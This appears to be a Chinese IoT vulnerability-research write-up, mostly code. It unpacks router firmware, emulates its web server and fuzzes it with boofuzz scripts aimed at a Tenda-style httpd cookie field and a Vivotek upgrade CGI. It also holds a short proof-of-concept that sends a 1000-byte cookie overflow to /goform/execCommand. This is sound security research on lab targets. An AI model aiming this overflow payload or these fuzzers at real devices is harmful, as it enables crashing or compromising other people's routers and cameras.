一
正文
# Fetch and build sasquatch (devttys0's unsquashfs fork) to unpack the firmware's squashfs image.
sudo git clone https://github.com/devttys0/sasquatch
cd sasquatch
sudo apt-get install build-essential liblzma-dev liblzo2-dev zlib1g-dev
./build.sh
# Locate which library exports the two symbols of interest; presumably run from the extracted
# squashfs root (the path ./lib/ is relative to the current directory).
find ./lib/ -name "*" | xargs grep 'check_network'
find ./lib/ -name "*" | xargs grep 'get_eth_name'
# Create a TAP interface for the emulated device and give the host side an address on the lab subnet.
# The '-u' argument is a placeholder: replace it with the user that should own br0.
sudo tunctl -t br0 -u #<username>
sudo ifconfig br0 192.168.10.1/24
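from boofuzz import *

# Address of the device under test; set this to your own lab target's IP.
IP = "10.10.10.1"
PORT = 80


def check_response(target, fuzz_data_logger, session, *args, **kwargs):
    """Post-test-case callback: read one reply, log it, and close the connection.

    Registered in ``post_test_case_callbacks`` on the Session built in ``main``.
    Every path ends with ``target.close()``; nothing is returned.

    Args:
        target: boofuzz Target the test case was sent to; ``recv`` and ``close``
            are called on it.
        fuzz_data_logger: logger receiving ``log_info`` / ``log_fail`` lines.
        session: the running Session; unused here, kept for the callback signature.
    """
    fuzz_data_logger.log_info("Checking test case response...")
    try:
        response = target.recv(512)
    except Exception:  # narrowed from bare except so Ctrl-C is no longer swallowed
        fuzz_data_logger.log_fail("Unable to connect to target. Closing...")
        target.close()
        return
    # An empty read is reported as a possible hang so it shows up in the log.
    if not response:
        fuzz_data_logger.log_fail("Empty response, target may be hung. Closing...")
        target.close()
        return
    # Remove everything after the null terminator and convert to string:
    # response = response[:response.index(0)].decode('utf-8')
    # errors="replace" keeps a non-UTF-8 reply from raising inside the callback
    # and aborting the whole session.
    fuzz_data_logger.log_info("response check...\n" + response.decode(errors="replace"))
    target.close()


def main():
    """Build the HTTP request model and fuzz the service at IP:PORT."""
    # Process-monitor setup kept for reference; it expects boofuzz's process
    # monitor listening on 127.0.0.1:26002 and is currently disabled.
    # options = {
    #     "start_commands": [
    #         "sudo chroot /home/lys/Documents/IoT/firmware/_AC15_V15.03.1.16.bin.extracted/squashfs-root ./httpd"
    #     ],
    #     "stop_commands": ["echo stopping"],
    #     "proc_name": ["/usr/bin/qemu-arm-static ./httpd"]
    # }
    # procmon = ProcessMonitor("127.0.0.1", 26002)
    # procmon.set_options(**options)
    session = Session(
        target=Target(
            connection=SocketConnection(IP, PORT, proto="tcp"),
            # monitors=[procmon]
        ),
        post_test_case_callbacks=[check_response],
    )

    s_initialize(name="Request")
    with s_block("Request-Line"):
        # Line 1: request line with a fixed path.
        s_group("Method", ["GET"])
        s_delim(" ", fuzzable=False, name="space-1-1")
        s_string("/goform/123", fuzzable=False)  # fuzzable 1
        s_delim(" ", fuzzable=False, name="space-1-2")
        s_static("HTTP/1.1", name="HTTP_VERSION")
        s_static("\r\n", name="Request-Line-CRLF-1")
        # Line 2: Host header.
        s_static("Host")
        s_delim(": ", fuzzable=False, name="space-2-1")
        s_string("10.10.10.1", fuzzable=False, name="IP address")
        s_static("\r\n", name="Request-Line-CRLF-2")
        # Line 3: Connection header.
        s_static("Connection")
        s_delim(": ", fuzzable=False, name="space-3-1")
        s_string("keep-alive", fuzzable=False, name="Connection state")
        s_static("\r\n", name="Request-Line-CRLF-3")
        # Line 4: Cookie header; the password value is the only s_string with fuzzable=True.
        s_static("Cookie")
        s_delim(": ", fuzzable=False, name="space-4-1")
        s_string("bLanguage", fuzzable=False, name="key-bLanguage")
        s_delim("=", fuzzable=False)
        s_string("en", fuzzable=False, name="value-bLanguage")
        s_delim("; ", fuzzable=False)
        s_string("password", fuzzable=False, name="key-password")
        s_delim("=", fuzzable=False)
        s_string("ce24124987jfjekfjlasfdjmeiruw398r", fuzzable=True)  # fuzzable 2
        s_static("\r\n", name="Request-Line-CRLF-4")
        # End of headers.
        s_static("\r\n")
        s_static("\r\n")

    session.connect(s_get("Request"))
    session.fuzz()


if __name__ == "__main__":
    main()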
import requests

# Target address; change this to your own device's IP.
ip = "10.10.10.1"
url = f"http://{ip}/goform/execCommand"
# One cookie, named "Cookie", carrying a 1000-byte value; sent via the cookies= parameter.
cookie = {"Cookie": "password=" + "A" * 1000}
ret = requests.get(url=url, cookies=cookie)
# print(ret.text)
_CC8160-VVTK-0100d.flash.pkg.extracted/_31.extracted/_rootfs.img.extracted/squashfs-root
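from boofuzz import *

# Address of the device under test (here the emulated service on localhost).
IP = "127.0.0.1"
PORT = 80


def check_response(target, fuzz_data_logger, session, *args, **kwargs):
    """Post-test-case callback: read one reply, log it, and close the connection.

    Registered in ``post_test_case_callbacks`` on the Session built in ``main``.
    Every path ends with ``target.close()``; nothing is returned.

    Args:
        target: boofuzz Target the test case was sent to; ``recv`` and ``close``
            are called on it.
        fuzz_data_logger: logger receiving ``log_info`` / ``log_fail`` lines.
        session: the running Session; unused here, kept for the callback signature.
    """
    fuzz_data_logger.log_info("Checking test case response...")
    try:
        response = target.recv(512)
    except Exception:  # narrowed from bare except so Ctrl-C is no longer swallowed
        fuzz_data_logger.log_fail("Unable to connect to target. Closing...")
        target.close()
        return
    # An empty read is reported as a possible hang so it shows up in the log.
    if not response:
        fuzz_data_logger.log_fail("Empty response, target may be hung. Closing...")
        target.close()
        return
    # Remove everything after the null terminator and convert to string:
    # response = response[:response.index(0)].decode('utf-8')
    # errors="replace" keeps a non-UTF-8 reply from raising inside the callback
    # and aborting the whole session.
    fuzz_data_logger.log_info("response check...\n" + response.decode(errors="replace"))
    target.close()


def main():
    """Build the HTTP request model and fuzz the service at IP:PORT."""
    # Process-monitor setup kept for reference; it expects boofuzz's process
    # monitor listening on 127.0.0.1:26002 and is currently disabled.
    # options = {
    #     "start_commands": [
    #         "sudo chroot /home/lys/Documents/IoT/firmware/_AC15_V15.03.1.16.bin.extracted/squashfs-root ./httpd"
    #     ],
    #     "stop_commands": ["echo stopping"],
    #     "proc_name": ["/usr/bin/qemu-arm-static ./httpd"]
    # }
    # procmon = ProcessMonitor("127.0.0.1", 26002)
    # procmon.set_options(**options)
    session = Session(
        target=Target(
            connection=SocketConnection(IP, PORT, proto="tcp"),
            # monitors=[procmon]
        ),
        post_test_case_callbacks=[check_response],
    )

    s_initialize(name="Request")
    with s_block("Request-Line"):
        # Line 1: request line with a fixed path.
        s_group("Method", ["POST"])
        s_delim(" ", fuzzable=False, name="space-1-1")
        s_string("/cgi-bin/admin/upgrade.cgi", fuzzable=False)
        s_delim(" ", fuzzable=False, name="space-1-2")
        s_static("HTTP/1.1", name="HTTP_VERSION")
        s_static("\r\n", name="Request-Line-CRLF-1")
        # Line 2: Content-Length header; its value is the only fuzzable field in this model.
        s_static("Content-Length")
        s_delim(": ", fuzzable=False, name="space-2-1")
        s_string("data", fuzzable=True)
        s_static("\r\n")

    session.connect(s_get("Request"))
    session.fuzz()


if __name__ == "__main__":
    main()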
二
总结
https://xz.aliyun.com/t/5054?time__1311=n4%2BxnD07iti%3Dj2DBqooGkYLwq6DBDYTAD
https://www.anquanke.com/post/id/185336
https://blog.csdn.net/song_lee/article/details/113800058
看雪ID:pureGavin
https://bbs.kanxue.com/user-home-777502.htm